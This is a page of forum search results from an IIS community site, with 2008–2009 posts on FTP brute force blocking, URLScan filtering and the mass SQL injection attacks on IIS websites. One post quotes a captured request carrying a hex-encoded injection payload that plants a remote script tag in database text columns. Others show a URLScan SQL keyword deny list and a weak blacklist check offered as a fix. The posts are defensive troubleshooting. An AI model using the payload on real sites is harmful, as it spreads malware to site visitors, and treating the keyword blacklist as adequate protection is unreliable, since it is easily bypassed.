Search results matching tag 'hacking'

Re: IIS 6 FTP Server brute force attacks, can I block IPs automatically after many failures?

TolchinJ — Thu, 01 Oct 2009 15:18:50 GMT

A very inexpensive solution for blocking FTP Attacks on IIS servers can be found at:
http://www.ftpblocker.com/

It is very useful for smaller business who don't have hardware firewalls or sniffers to block these attacks.

URL Scan and __VIEWSTATE

Vissuluth — Wed, 27 Aug 2008 06:36:12 GMT

Ive been trying to write a filter based on __VIEWSTATE but I can only get it to scan and filter based on the viewstate if I use ScanAllRaw=1

URLScan rule:

[ViewState]
AppliesTo=.asp,.aspx
DenyDataSection=ViewState Strings
ScanUrl=0
ScanAllRaw=1
ScanQueryString=0
ScanHeaders=

[ViewState Strings]
--
%3b ; a semicolon
char ; also catches nchar and varchar
alter
begin
cast
convert
create
cursor
declare
delete
drop
end
exec ; also catches execute
fetch
insert
kill
open
select
sys ; also catches sysobjects and syscolumns
table
update
<
>

Packet scan showing a test __VIEWSTATE

POST /apps/app1/default.aspx HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, application/x-silverlight, */*
Referer: http://www.mysite.com/apps/app1/default.aspx
Accept-Language: en-au
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)
Host: www.mysite.com
Content-Length: 2082
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=mq31bq454obiad35me15dy55

__VIEWSTATE=%2FwEPDwUKLTU0OTUzNjg5Mg9kFgICAQ9kFgQCAQ8PFgIeB1Zpc2libGVnZBYEAgUPFgIfAGdkAgcPFgIfAGdkAgUPZBYCAgEPEGRkFgBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYJBQlPbkFjY291bnQFCklUSGFyZHdhcmUFBnByZXBheQUOSVRhbmRUZWxlY29tbXMFBlJlc2lnbgUJQnJvYWRiYW5kBQtNb2JpbGVFbWFpbAUNU2VydmljZUNlbnRyZQUGc2VhcmNoOs%2FTMSXLHNx%2BinCpHVlgrFxtP04%3D&txtStoreName=&txtAddress=%3C%3E%3Bselect+*%3Bdeclare%3Bhttp%3A%2F%2F%3Ftype%3DMO%26state%3DNSW%27%3BDECLARE%2520@S%2520CHAR%284%29%3BSET%2520@S%3DCAS+T%280x4445434C41524+520405420766172+636861722832%273535292C40432076617%272636861722834303030%2229204445434C41524520+5461626C655F43%227572736F7220435g552534F5220464F5220773656C65637420612E6E616D6452C622E6E616D652066726F6D2073%2279736F626A6563747320612C7379%2773636F6C756D6E73206220776865726520%25612E69643D622E696420616E6420612E7874797065378D27752720616E642028622E78747970653D33939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%2520AS%2520CHAR%284%29%29%3BEXEC%28@S%29%3B&txtsuburb=%3E%3C&OnAccount=on&prepay=on&Resign=on&Broadband=on&MobileEmail=on&ServiceCentre=on&Address=&X=&Y=&multiplepanel=&streetVal=%3C%3E%3Bselect+*%3Bdeclare%3B&suburbVal=%3E%3C&regionVal=&search.x=45&search.y=5

Can anyone fill me in on what Im missing so I can write the rule to only scan the viewstate rather than the entire header?

SQL Injection Attacks on IIS Web Servers

bills — Sat, 26 Apr 2008 03:41:33 GMT

This thread will contain the latest information regarding recent reports that have surfaced stating that web sites running on Microsoft’s Internet Information Services (IIS) 6.0 have been compromised. These reports allude to a possible vulnerability in IIS or issues related to Security Advisory 951306 which was released last week.

Microsoft has investigated these reports and determined that the attacks are not related to the recent Microsoft Security Advisory (951306) or any known security issues related to IIS 6.0, ASP, ASP.Net or Microsoft SQL technologies.

Instead, attackers have crafted an automated attack that can take advantage of SQL injection vulnerabilities in web pages that do not follow security best practices for web application development. While these particular attacks are targeting sites hosted on IIS web servers, SQL injection vulnerabilities may exist on sites hosted on any platform. More information on SQL injection attacks can be found here and here.

Guidance from Microsoft for web application development best practices can also be found on this MSDN page. Best practices guidelines that developers may follow to mitigate SQL injection, can be located here. As we continue to make progress in our investigation on this attack, we will provide updated guidance and information on the IIS.net site. For the latest information on this issue, please subscribe or visit the IIS security forum.

For end-users, the investigation also shows no indication of an un-patched vulnerability in IIS, SQL Server, Internet Explorer or any other Microsoft client software, so we recommend customers apply the latest updates to be protected from these attacks.

To further protect themselves from reported attacks, we encourage all customers to apply our most recent security updates to help ensure that their computers are protected from attempted criminal attacks. For more information about security updates, visit: www.microsoft.com/protect.

Anyone believed to have been affected can visit: http://www.microsoft.com/protect/support/default.mspx and should contact the national law enforcement agency in their country. Those in the United States can contact Customer Service and Support at no charge using the PC Safety hotline at 1-866-PCSAFETY. Additionally, customers in the United States should contact their local FBI office or report their situation at: www.ic3.gov

Subscribe to this thread, or check back later for the latest information from the community.

Re: Anyone know about www.nihaorr1.com/1.js?

nhertz — Thu, 24 Apr 2008 21:11:03 GMT

I would advise anyone affected by this attack to activate the SQL profiler (or equivalent) and set it to record only EXEC commands. If your website then becomes infected again you can quickly scroll through the profiler output and find the "suspicious" command where the injection has entered. This should also give you a hint of the exact page that had the vulnerability.

I cleaned up a site this week where the profiler had recorded:

SELECT TOP 100 People.Countries, States.Titles, Houses.Types FROM People, States, Houses Where People.Titles LIKE '%agent;DECLARE @S NVARCHAR(4000);SET etc......

So I could quickly locate the page which had the SELECT TOP 100 statement.
That is where I added the quick fix:

<%
some code here....
%>

<%
rs.Open sql
%>

With the validator file containing:

<%
if instr(lcase(sql),";--")>0 then
response.redirect("index.asp")
end if

if instr(lcase(sql),"nvarchar")>0 then
response.redirect("index.asp")
end if
%>

Cheers and good luck,

Nicolai Hertz
software programmer